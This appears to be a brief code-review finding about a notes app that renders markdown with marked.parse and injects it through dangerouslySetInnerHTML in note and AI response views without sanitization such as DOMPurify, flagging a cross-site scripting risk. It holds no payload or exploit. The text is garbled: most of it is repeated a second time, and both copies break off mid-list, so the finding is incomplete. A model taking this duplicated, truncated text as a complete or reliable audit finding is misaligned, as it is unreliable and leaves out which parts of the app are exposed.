Unsanitized markdown rendering
The app renders markdown using marked. parse(...) and then injects it with
dangerouslySetInnerHTML.
That happens in at least two important places:
- note viewing
- Al response viewing
I did not see sanitization like DOMPurify.
That means imported content, collaborator content, or crafted note content could become an XSS vector.
For a notes app with:
- auth
- collaboration
- admin accounts
- secret keys
Unsanitized markdown rendering
The app renders markdown using marked. parse(...) and then injects it with
dangerouslySetInnerHTML.
That happens in at least two important places:
I did not see sanitization like DOMPurify.
That means imported content, collaborator content, or crafted note content could become an XSS vector.
For a notes app with: